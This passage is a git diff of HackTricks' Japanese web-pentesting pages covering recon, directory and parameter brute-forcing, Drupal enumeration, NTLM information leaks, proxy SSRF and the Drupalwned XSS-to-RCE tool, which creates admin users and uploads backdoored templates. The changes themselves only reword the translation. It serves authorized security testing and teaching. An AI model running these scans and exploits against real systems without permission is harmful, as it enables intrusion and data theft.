@@ -19,6 +19,7 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0
 ```
 ### Web API Guidance
 
+
 {{#ref}}
 web-api-pentesting.md
 {{#endref}}
@@ -30,14 +31,14 @@ web-api-pentesting.md
 - [ ] **技術**を**特定**することから始めます。技術を特定できた場合、テストの残りの部分で考慮すべき**トリック**を探します。
 - [ ] 技術のバージョンに**既知の脆弱性**はありますか?
 - [ ] **よく知られた技術**を使用していますか?より多くの情報を抽出するための**便利なトリック**はありますか?
-- [ ] 実行するための**専門のスキャナー**はありますか(例えば、wpscan)?
+- [ ] 実行するための**専門スキャナー**はありますか(例えば、wpscan)?
 - [ ] **一般的なスキャナー**を起動します。何かを見つけるか、興味深い情報を見つけるかはわかりません。
-- [ ] **初期チェック**を開始します:**robots**、**sitemap**、**404**エラー、**SSL/TLSスキャン**(HTTPSの場合)。
-- [ ] ウェブページの**スパイダー**を開始します:すべての可能な**ファイル、フォルダー**、および**使用されているパラメータ**を**見つける**時間です。また、**特別な発見**を確認します。
-- [ ] _ブルートフォースやスパイダー中に新しいディレクトリが発見されるたびに、それをスパイダーする必要があります。_
+- [ ] **初期チェック**から始めます:**robots**、**sitemap**、**404**エラー、**SSL/TLSスキャン**(HTTPSの場合)。
+- [ ] ウェブページを**スパイダー**します:すべての可能な**ファイル、フォルダー**、および**使用されているパラメータ**を**見つける**時間です。また、**特別な発見**を確認します。
+- [ ] _ブルートフォースやスパイダー中に新しいディレクトリが発見された場合は、必ずスパイダーする必要があります。_
 - [ ] **ディレクトリブルートフォース**:発見されたすべてのフォルダーをブルートフォースして、新しい**ファイル**や**ディレクトリ**を探します。
-- [ ] _ブルートフォースやスパイダー中に新しいディレクトリが発見されるたびに、それをブルートフォースする必要があります。_
-- [ ] **バックアップの確認**:一般的なバックアップ拡張子を追加して、**発見されたファイル**の**バックアップ**を見つけられるかテストします。
+- [ ] _ブルートフォースやスパイダー中に新しいディレクトリが発見された場合は、必ずブルートフォースする必要があります。_
+- [ ] **バックアップチェック**:一般的なバックアップ拡張子を追加して、**発見されたファイル**の**バックアップ**を見つけられるかテストします。
 - [ ] **パラメータのブルートフォース**:**隠れたパラメータ**を**見つける**ことを試みます。
 - [ ] **ユーザー入力**を受け入れるすべての可能な**エンドポイント**を**特定**したら、それに関連するすべての種類の**脆弱性**を確認します。
 - [ ] [このチェックリストに従ってください](../../pentesting-web/web-vulnerabilities-methodology.md)
@@ -47,7 +48,7 @@ web-api-pentesting.md
 ### Identify
 
 実行中のサーバー**バージョン**に**既知の脆弱性**があるか確認します。\
-**HTTPヘッダーとレスポンスのクッキー**は、使用されている**技術**や**バージョン**を**特定**するのに非常に役立ちます。**Nmapスキャン**はサーバーバージョンを特定できますが、[**whatweb**](https://github.com/urbanadventurer/WhatWeb)**、** [**webtech** ](https://github.com/ShielderSec/webtech)または [**https://builtwith.com/**](https://builtwith.com)**のツールも役立つかもしれません:
+**HTTPヘッダーとレスポンスのクッキー**は、使用されている**技術**や**バージョン**を**特定**するのに非常に役立ちます。**Nmapスキャン**はサーバーバージョンを特定できますが、[**whatweb**](https://github.com/urbanadventurer/WhatWeb)**、**[**webtech**](https://github.com/ShielderSec/webtech)や[**https://builtwith.com/**](https://builtwith.com)**のツールも役立ちます:
 ```bash
 whatweb -a 1  #Stealthy
 whatweb -a 3  #Aggresive
@@ -99,18 +100,18 @@ Search **for** [**vulnerabilities of the web application** **version**](../../ge
 - [**Wordpress**](wordpress.md)
 - [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
 
-_同じドメインが異なる**ポート**、**フォルダ**、および**サブドメイン**で異なる**技術**を使用している可能性があることを考慮してください。_\
-ウェブアプリケーションが前述のよく知られた**技術/プラットフォーム**または**その他の技術**を使用している場合は、**インターネットで新しいトリックを検索する**ことを忘れないでください(そして私に知らせてください!)。
+_同じドメインが異なる**ポート**、**フォルダ**、および**サブドメイン**で**異なる技術**を使用している可能性があることに注意してください。_\
+ウェブアプリケーションが前述の**技術/プラットフォーム**や**その他の技術**を使用している場合は、**インターネットで新しいトリックを検索する**ことを忘れないでください(そして教えてください!)。
 
 ### Source Code Review
 
-アプリケーションの**ソースコード**が**github**で利用可能な場合、アプリケーションの**ホワイトボックステスト**を自分で実施することに加えて、現在の**ブラックボックステスト**に役立つ**情報**がいくつかあります:
+アプリケーションの**ソースコード**が**github**で利用可能な場合、アプリケーションの**ホワイトボックステスト**を自分で行うことに加えて、現在の**ブラックボックステスト**に役立つ**情報**がいくつかあります:
 
 - **Change-log**や**Readme**、**Version**ファイル、または**バージョン情報にアクセス可能な**ものはありますか?
 - **資格情報**はどのように、どこに保存されていますか?資格情報(ユーザー名やパスワード)が含まれる(アクセス可能な?)**ファイル**はありますか?
-- **パスワード**は**平文**、**暗号化**されていますか、それともどの**ハッシュアルゴリズム**が使用されていますか?
-- 何かを暗号化するために**マスターキー**を使用していますか?どの**アルゴリズム**が使用されていますか?
-- 脆弱性を悪用してこれらのファイルのいずれかに**アクセス**できますか?
+- **パスワード**は**プレーンテキスト**、**暗号化**されていますか、それともどの**ハッシュアルゴリズム**が使用されていますか?
+- 何かを暗号化するための**マスターキー**を使用していますか?どの**アルゴリズム**が使用されていますか?
+- 脆弱性を悪用して**これらのファイルのいずれかにアクセス**できますか?
 - **github**に**興味深い情報**(解決済みおよび未解決の)**問題**はありますか?または**コミット履歴**に(古いコミット内に**導入されたパスワード**があるかもしれません)?
 
 {{#ref}}
@@ -133,7 +134,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi
 ```
 #### CMSスキャナー
 
-CMSが使用されている場合は、**スキャナーを実行する**ことを忘れないでください。何か興味深いものが見つかるかもしれません:
+CMSが使用されている場合は、**スキャナーを実行する**ことを忘れないでください。もしかしたら何か興味深いものが見つかるかもしれません:
 
 [**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
 [**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** ウェブサイトのセキュリティ問題。(GUI)\
@@ -181,7 +182,7 @@ joomlavs.rb #https://github.com/rastating/joomlavs
 
 ### **SSL/TLSの脆弱性**
 
-- アプリケーションがどの部分でも**HTTPSの使用を強制していない**場合、**MitMに対して脆弱**です。
+- アプリケーションが**HTTPSの使用を強制していない**場合、**MitMに対して脆弱**です。
 - アプリケーションが**HTTPを使用して機密データ(パスワード)を送信している**場合、これは高い脆弱性です。
 
 [**testssl.sh**](https://github.com/drwetter/testssl.sh)を使用して**脆弱性**をチェックし(バグバウンティプログラムではこの種の脆弱性は受け入れられない可能性があります)、[**a2sv**](https://github.com/hahwul/a2sv)を使用して脆弱性を再確認してください:
@@ -205,25 +206,25 @@ SSL/TLSの脆弱性に関する情報:
 - [**gospider**](https://github.com/jaeles-project/gospider) (go): HTMLスパイダー、JSファイル内のLinkFinderおよび外部ソース(Archive.org、CommonCrawl.org、VirusTotal.com、AlienVault.com)。
 - [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HMLスパイダー、JSファイル用のLinkFinderおよび外部ソースとしてのArchive.org。
 - [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTMLスパイダー、「おいしいファイル」も示します。
-- [**evine** ](https://github.com/saeeddhqan/evine)(go): インタラクティブCLI HTMLスパイダー。Archive.orgでも検索します。
+- [**evine** ](https://github.com/saeeddhqan/evine)(go): インタラクティブCLI HTMLスパイダー。Archive.org内も検索します。
 - [**meg**](https://github.com/tomnomnom/meg) (go): このツールはスパイダーではありませんが、有用です。ホストのファイルとパスのファイルを指定すると、megは各ホストの各パスを取得し、応答を保存します。
 - [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): JSレンダリング機能を持つHTMLスパイダー。ただし、メンテナンスされていないようで、事前コンパイルされたバージョンは古く、現在のコードはコンパイルされません。
 - [**gau**](https://github.com/lc/gau) (go): 外部プロバイダー(wayback、otx、commoncrawl)を使用するHTMLスパイダー。
 - [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): このスクリプトはパラメータを持つURLを見つけてリストします。
 - [**galer**](https://github.com/dwisiswant0/galer) (go): JSレンダリング機能を持つHTMLスパイダー。
 - [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTMLスパイダー、JSファイル内の新しいパスを検索できるJSビューティファイ機能を持っています。LinkFinderのラッパーである[JSScanner](https://github.com/dark-warlord14/JSScanner)も見る価値があります。
-- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): HTMLソースと埋め込まれたJavaScriptファイルの両方からエンドポイントを抽出します。バグハンター、レッドチーム、インフォセキュリティの忍者に便利です。
-- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): TornadoとJSBeautifierを使用してJavaScriptファイルから相対URLを解析するPython 2.7スクリプト。AJAXリクエストを簡単に発見するのに便利です。メンテナンスされていないようです。
-- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): ファイル(HTML)を与えると、巧妙な正規表現を使用して相対URLを見つけて抽出します。
+- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): HTMLソースと埋め込まれたJavaScriptファイルの両方からエンドポイントを抽出します。バグハンター、レッドチーム、インフォセキュリティの専門家に役立ちます。
+- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): TornadoとJSBeautifierを使用してJavaScriptファイルから相対URLを解析するPython 2.7スクリプト。AJAXリクエストを簡単に発見するのに役立ちます。メンテナンスされていないようです。
+- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): ファイル(HTML)を与えると、巧妙な正規表現を使用して相対URLを抽出します。
 - [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash、いくつかのツール): いくつかのツールを使用してJSファイルから興味深い情報を収集します。
 - [**subjs**](https://github.com/lc/subjs) (go): JSファイルを見つけます。
-- [**page-fetch**](https://github.com/detectify/page-fetch) (go): ヘッドレスブラウザでページを読み込み、ページを読み込むために読み込まれたすべてのURLを印刷します。
+- [**page-fetch**](https://github.com/detectify/page-fetch) (go): ヘッドレスブラウザでページを読み込み、ページを読み込むためにロードされたすべてのURLを印刷します。
 - [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): 以前のツールのいくつかのオプションを組み合わせたコンテンツ発見ツール。
 - [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): JSファイル内のパスとパラメータを見つけるためのBurp拡張機能。
 - [**Sourcemapper**](https://github.com/denandz/sourcemapper): .js.map URLを与えると、ビューティファイドJSコードを取得します。
 - [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): 特定のターゲットのエンドポイントを発見するために使用されるツールです。
 - [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Waybackマシンからリンクを発見します(応答をダウンロードし、さらにリンクを探します)。
-- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): フォームを埋めることによるクロールや、特定の正規表現を使用して機密情報を見つけます。
+- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): フォームを埋めることによるクローリングや、特定の正規表現を使用して機密情報を見つけます。
 - [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suiteは、サイバーセキュリティ専門家向けに設計された高度なマルチ機能GUIウェブセキュリティクローラー/スパイダーです。
 - [**jsluice**](https://github.com/BishopFox/jsluice) (go): URL、パス、シークレット、その他の興味深いデータをJavaScriptソースコードから抽出するためのGoパッケージおよび[コマンドラインツール](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice)です。
 - [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForgeは、リクエストからパラメータとエンドポイントを抽出してカスタムワードリストを作成するためのシンプルな**Burp Suite拡張機能**です。
@@ -232,18 +233,18 @@ SSL/TLSの脆弱性に関する情報:
 
 ### ディレクトリとファイルのブルートフォース
 
-ルートフォルダから**ブルートフォース**を開始し、**この方法**で見つかった**すべてのディレクトリ**と**スパイダーリング**によって**発見された**すべてのディレクトリをブルートフォースすることを確認してください(このブルートフォースは**再帰的に**行うことができ、使用するワードリストの先頭に見つかったディレクトリの名前を追加します)。\
+ルートフォルダから**ブルートフォース**を開始し、**この方法**で見つかった**すべてのディレクトリ**と**スパイダーリング**によって**発見された**すべてのディレクトリをブルートフォースすることを確認してください(このブルートフォースを**再帰的に**行い、使用するワードリストの先頭に見つかったディレクトリの名前を追加できます)。\
 ツール:
 
 - **Dirb** / **Dirbuster** - Kaliに含まれており、**古い**(および**遅い**)ですが機能します。自己署名証明書と再帰検索を許可します。他のオプションと比較して遅すぎます。
-- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: 自己署名証明書は許可されていませんが**再帰検索を許可します。
+- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: 自己署名証明書を許可しませんが**、再帰検索を許可します。
 - [**Gobuster**](https://github.com/OJ/gobuster) (go): 自己署名証明書を許可し、**再帰的**検索はありません。
 - [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- 高速、再帰検索をサポートします。**
 - [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
 - [**ffuf** ](https://github.com/ffuf/ffuf)- 高速: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
 - [**uro**](https://github.com/s0md3v/uro) (python): これはスパイダーではありませんが、見つかったURLのリストを与えると「重複」URLを削除します。
 - [**Scavenger**](https://github.com/0xDexter0us/Scavenger): 異なるページのburp履歴からディレクトリのリストを作成するためのBurp拡張機能。
-- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): 機能が重複しているURLを削除します(jsインポートに基づく)。
+- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): JSインポートに基づいて重複機能を持つURLを削除します。
 - [**Chamaleon**](https://github.com/iustin24/chameleon): 使用されている技術を検出するためにwapalyzerを使用し、使用するワードリストを選択します。
 
 **推奨辞書:**
@@ -269,62 +270,64 @@ _ブルートフォースやスパイダーリング中に新しいディレク
 
 ### 見つかった各ファイルで確認すべきこと
 
-- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): HTML内の壊れたリンクを見つけ、乗っ取りの危険があるかもしれません。
+- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): 乗っ取りの危険があるHTML内の壊れたリンクを見つけます。
 - **ファイルバックアップ**: すべてのファイルを見つけたら、すべての実行可能ファイル("_.php_", "_.aspx_"...)のバックアップを探します。バックアップの命名に一般的なバリエーションは次のとおりです: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmpおよびfile.old._ また、[**bfac**](https://github.com/mazen160/bfac) **または** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**を使用できます。**
-- **新しいパラメータを発見する**: [**Arjun**](https://github.com/s0md3v/Arjun)**、** [**parameth**](https://github.com/maK-/parameth)**、** [**x8**](https://github.com/sh1yo/x8) **および** [**Param Miner**](https://github.com/PortSwigger/param-miner) **を使用して隠れたパラメータを発見できます。可能であれば、各実行可能ウェブファイルで隠れたパラメータを検索してみてください。**
+- **新しいパラメータを発見**: [**Arjun**](https://github.com/s0md3v/Arjun)**、** [**parameth**](https://github.com/maK-/parameth)**、** [**x8**](https://github.com/sh1yo/x8) **および** [**Param Miner**](https://github.com/PortSwigger/param-miner) **を使用して隠れたパラメータを発見できます。可能であれば、各実行可能ウェブファイルで隠れたパラメータを検索してみてください。**
 - _Arjunのすべてのデフォルトワードリスト:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
 - _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
 - _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
 - _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
-- **コメント:** すべてのファイルのコメントを確認してください。**認証情報**や**隠れた機能**が見つかるかもしれません。
-- **CTF**をプレイしている場合、「一般的な」トリックは、ページの**右側**に**情報**を**隠す**ことです(**数百**の**スペース**を使用して、ブラウザでソースコードを開いてもデータが見えないようにします)。もう一つの可能性は、**いくつかの新しい行**を使用して、ウェブページの**下部**にコメントで**情報を隠す**ことです。
+- **コメント:** すべてのファイルのコメントを確認してください。**資格情報**や**隠れた機能**を見つけることができます。
+- **CTF**をプレイしている場合、「一般的な」トリックは、**ページの右側のコメント内に** **情報**を**隠す**ことです(**数百**の**スペース**を使用して、ブラウザでソースコードを開いてもデータが見えないようにします)。もう一つの可能性は、**いくつかの新しい行**を使用して、ウェブページの**下部**にコメント内に**情報を隠す**ことです。
 - **APIキー**: **APIキー**を見つけた場合、さまざまなプラットフォームのAPIキーの使用方法を示すガイドがあります: [**keyhacks**](https://github.com/streaak/keyhacks)**、** [**zile**](https://github.com/xyele/zile.git)**、** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**、** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**、** [**RegHex**]()**、** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**、** [**EarlyBird**](https://github.com/americanexpress/earlybird)
 - Google APIキー: **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjikのようなAPIキーを見つけた場合、プロジェクト[**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner)を使用して、キーがアクセスできるAPIを確認できます。
 - **S3バケット**: スパイダーリング中に、**サブドメイン**や**リンク**が**S3バケット**に関連しているかどうかを確認してください。その場合、[**バケットの** **権限**を**確認**](buckets/index.html)してください。
 
 ### 特別な発見
 
-**スパイダーリング**と**ブルートフォース**を実行している間に、**興味深い****もの**を**見つける**ことがあります。
+**スパイダーリング**と**ブルートフォース**を実行している間に、**興味深い** **もの**を**見つける**ことがあります。
 
 **興味深いファイル**
 
 - **CSS**ファイル内の他のファイルへの**リンク**を探します。
 - [**.git**ファイルを見つけた場合、いくつかの情報を抽出できます](git.md)
-- **.env**を見つけた場合、APIキー、DBパスワードなどの情報が見つかるかもしれません。
+- **.env**を見つけた場合、APIキー、DBパスワード、その他の情報が見つかる可能性があります。
 - **APIエンドポイント**を見つけた場合、[それらをテストする必要があります](web-api-pentesting.md)。これらはファイルではありませんが、おそらく「ファイルのように見える」でしょう。
-- **JSファイル**: スパイダーリングセクションでは、JSファイルからパスを抽出できるいくつかのツールが言及されました。また、見つかった各JSファイルを**監視する**ことも興味深いでしょう。なぜなら、場合によっては、変更がコードに潜在的な脆弱性が導入されたことを示すかもしれないからです。たとえば、[**JSMon**](https://github.com/robre/jsmon)**を使用できます。**
+- **JSファイル**: スパイダーリングセクションで、JSファイルからパスを抽出できるいくつかのツールが言及されました。また、見つかった各JSファイルを**監視する**ことも興味深いでしょう。場合によっては、変更がコードに潜在的な脆弱性が導入されたことを示すかもしれません。たとえば、[**JSMon**](https://github.com/robre/jsmon)**を使用できます。**
 - 発見されたJSファイルを[**RetireJS**](https://github.com/retirejs/retire.js/)または[**JSHole**](https://github.com/callforpapers-source/jshole)で確認して、脆弱性があるかどうかを確認してください。
 - **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/)、[https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
 - **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io)、[http://jsnice.org/](http://jsnice.org)
 - **JsFuckのデオブフスケーション** (文字でのjavascript:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
 - [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
 - いくつかの場面で、使用されている**正規表現**を**理解する**必要があります。これは役立ちます: [https://regex101.com/](https://regex101.com) または [https://pythonium.net/regex](https://pythonium.net/regex)
-- **フォームが検出されたファイルを監視する**こともできます。パラメータの変更や新しいフォームの出現は、潜在的な新しい脆弱な機能を示すかもしれません。
+- フォームが検出されたファイルを**監視する**こともできます。パラメータの変更や新しいフォームの出現は、潜在的な新しい脆弱な機能を示すかもしれません。
 
 **403 Forbidden/Basic Authentication/401 Unauthorized (バイパス)**
 
+
 {{#ref}}
 403-and-401-bypasses.md
 {{#endref}}
 
 **502 Proxy Error**
 
-ページが**そのコード**で**応答**する場合、それはおそらく**不適切に構成されたプロキシ**です。**`GET https://google.com HTTP/1.1`**のようなHTTPリクエストを送信すると(ホストヘッダーや他の一般的なヘッダーを含む)、**プロキシ**は_**google.com**_に**アクセス**しようとし、**SSRF**を見つけることになります。
+ページが**そのコード**で**応答**する場合、**不適切に構成されたプロキシ**の可能性があります。**`GET https://google.com HTTP/1.1`**のようなHTTPリクエストを送信すると(ホストヘッダーや他の一般的なヘッダーを含む)、**プロキシ**は_**google.com**_に**アクセス**しようとし、**SSRF**を見つけることになります。
 
 **NTLM認証 - 情報漏洩**
 
-認証を要求しているサーバーが**Windows**であるか、**資格情報**を要求するログインを見つけた場合(**ドメイン名**を要求する場合)、**情報漏洩**を引き起こすことができます。\
-**ヘッダーを送信します**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` そして、**NTLM認証の動作**により、サーバーは内部情報(IISバージョン、Windowsバージョン...)を「WWW-Authenticate」ヘッダー内で応答します。\
-このプロセスを**自動化**するには、**nmapプラグイン**"_http-ntlm-info.nse_"を使用できます。
+認証を要求しているサーバーが**Windows**であるか、**資格情報**(および**ドメイン名**)を要求するログインを見つけた場合、**情報漏洩**を引き起こすことができます。\
+**ヘッダーを送信します**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` そして、**NTLM認証の動作**により、サーバーはヘッダー「WWW-Authenticate」内に内部情報(IISバージョン、Windowsバージョン...)を応答します。\
+これを**自動化**するには、**nmapプラグイン**"_http-ntlm-info.nse_"を使用できます。
 
 **HTTPリダイレクト (CTF)**
 
-**リダイレクション**内に**コンテンツ**を**挿入する**ことが可能です。このコンテンツは**ユーザーに表示されません**(ブラウザがリダイレクションを実行するため)が、そこに**隠されている**ものがあるかもしれません。
+**リダイレクション**内に**コンテンツ**を**挿入**することが可能です。このコンテンツは**ユーザーに表示されません**(ブラウザがリダイレクションを実行するため)が、そこに**隠されている**ものがあるかもしれません。
 
 ### ウェブ脆弱性のチェック
 
 ウェブアプリケーションの包括的な列挙が行われたので、多くの可能性のある脆弱性をチェックする時が来ました。チェックリストはここにあります:
 
+
 {{#ref}}
 ../../pentesting-web/web-vulnerabilities-methodology.md
 {{#endref}}
@@ -335,9 +338,9 @@ _ブルートフォースやスパイダーリング中に新しいディレク
 - [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html)
 - [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)
 
-### ページの変更を監視する
+### ページの変更を監視
 
-[https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io)のようなツールを使用して、脆弱性を挿入する可能性のある変更を監視することができます。
+[https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io)のようなツールを使用して、脆弱性を挿入する可能性のある変更を監視できます。
 
 ### HackTricks自動コマンド
 ```
diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md
index a539479e4..de34e3f3d 100644
--- a/src/network-services-pentesting/pentesting-web/buckets/README.md
+++ b/src/network-services-pentesting/pentesting-web/buckets/README.md
@@ -2,7 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-バケツの列挙と悪用についてもっと学びたい場合は、このページを確認してください:
+バケツの列挙と悪用についてもっと学びたい場合は、このページを確認してください:
+
 
 {{#ref}}
 https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum
diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
index 915915d72..a181e9180 100644
--- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
+++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
@@ -6,7 +6,8 @@
 
 Firebaseは主にモバイルアプリケーション向けのBackend-as-a-Serviceです。バックエンドのプログラミングの負担を軽減し、アプリケーションとバックエンドの相互作用を容易にする素晴らしいSDKやその他の興味深い機能を提供することに重点を置いています。
 
-Firebaseの詳細については、以下を参照してください:
+Firebaseの詳細については、以下を参照してください:
+
 
 {{#ref}}
 https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html
diff --git a/src/network-services-pentesting/pentesting-web/drupal/README.md b/src/network-services-pentesting/pentesting-web/drupal/README.md
index b3b8d2308..1ba1fdaf2 100644
--- a/src/network-services-pentesting/pentesting-web/drupal/README.md
+++ b/src/network-services-pentesting/pentesting-web/drupal/README.md
@@ -3,13 +3,13 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
 
-## Discovery
+## 発見
 
 - **メタ**を確認する
 ```bash
 curl https://www.drupal.org/ | grep 'content="Drupal'
 ```
-- **ノード**: Drupal **はノードを使用してコンテンツをインデックス化します**。ノードはブログ投稿、投票、記事など、**何でも保持できます**。ページのURIは通常、`/node/`の形式です。
+- **ノード**: Drupal **はノードを使用してコンテンツをインデックス化します**。ノードはブログ投稿、投票、記事など、**何でも保持できます**。ページのURIは通常、`/node/` の形式です。
 ```bash
 curl drupal-site.com/node/1
 ```
@@ -17,14 +17,14 @@ curl drupal-site.com/node/1
 
 ### バージョン
 
-- `/CHANGELOG.txt` を確認してください
+- `/CHANGELOG.txt` を確認してください。
 ```bash
 curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""
 
 Drupal 7.57, 2018-02-21
 ```
-> [!NOTE]
-> 新しいインストールのDrupalは、デフォルトで`CHANGELOG.txt`および`README.txt`ファイルへのアクセスをブロックします。
+> [!TIP]
+> 新しいDrupalのインストールでは、デフォルトで`CHANGELOG.txt`と`README.txt`ファイルへのアクセスがブロックされています。
 
 ### ユーザー列挙
 
@@ -37,7 +37,7 @@ Drupalはデフォルトで**3種類のユーザー**をサポートしていま
 **ユーザーを列挙するには:**
 
 - **ユーザー数を取得する**: `/user/1`、`/user/2`、`/user/3`...にアクセスし、ユーザーが存在しないことを示すエラーが返されるまで続けます。
-- **レジストリ**: `/user/register`にアクセスし、ユーザー名を作成しようとすると、名前がすでに使用されている場合はサーバーからのエラーで示されます。
+- **登録**: `/user/register`にアクセスし、ユーザー名を作成しようとします。名前がすでに使用されている場合、サーバーからのエラーで示されます。
 - **パスワードリセット**: ユーザーのパスワードをリセットしようとし、ユーザーが存在しない場合はエラーメッセージで明確に示されます。
 
 ### 隠しページ
@@ -60,7 +60,7 @@ droopescan scan drupal -u http://drupal-site.local
 ```
 ## RCE
 
-Drupalウェブコンソールにアクセスできる場合は、RCEを取得するためにこれらのオプションを確認してください:
+Drupalのウェブコンソールにアクセスできる場合は、RCEを取得するためにこれらのオプションを確認してください:
 
 {{#ref}}
 drupal-rce.md
@@ -68,9 +68,9 @@ drupal-rce.md
 
 ## From XSS to RCE
 
-- [**Drupalwned**](https://github.com/nowak0x01/Drupalwned): XSSをRCEまたはその他の重大な脆弱性に昇格させるDrupalエクスプロイトスクリプト。詳細については[**この投稿**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)を確認してください。**Drupalバージョン7.X.X、8.X.X、9.X.X、10.X.Xをサポートし、次のことを可能にします:**
+- [**Drupalwned**](https://github.com/nowak0x01/Drupalwned): XSSをRCEまたはその他の重大な脆弱性に昇格させるDrupalのエクスプロイトスクリプト。詳細については[**この投稿**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)を確認してください。**Drupalバージョン7.X.X、8.X.X、9.X.X、10.X.Xをサポートし、次のことを可能にします:**
 - _**特権昇格:**_ Drupalに管理者ユーザーを作成します。
-- _**(RCE) テンプレートのアップロード:**_ Drupalにバックドアされたカスタムテンプレートをアップロードします。
+- _**(RCE) テンプレートのアップロード:**_ Drupalにバックドアを仕込んだカスタムテンプレートをアップロードします。
 
 ## Post Exploitation
 
diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
index ec8d8bbd2..8df6dd6a3 100644
--- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
+++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
@@ -6,7 +6,7 @@
 
 Electronは、ローカルバックエンド(**NodeJS**)とフロントエンド(**Chromium**)を組み合わせていますが、最新のブラウザのセキュリティメカニズムのいくつかが欠けています。
 
-通常、Electronアプリのコードは`.asar`アプリケーション内に見つかります。コードを取得するには、抽出する必要があります:
+通常、Electronアプリのコードは`.asar`アプリケーション内にあります。コードを取得するには、抽出する必要があります:
 ```bash
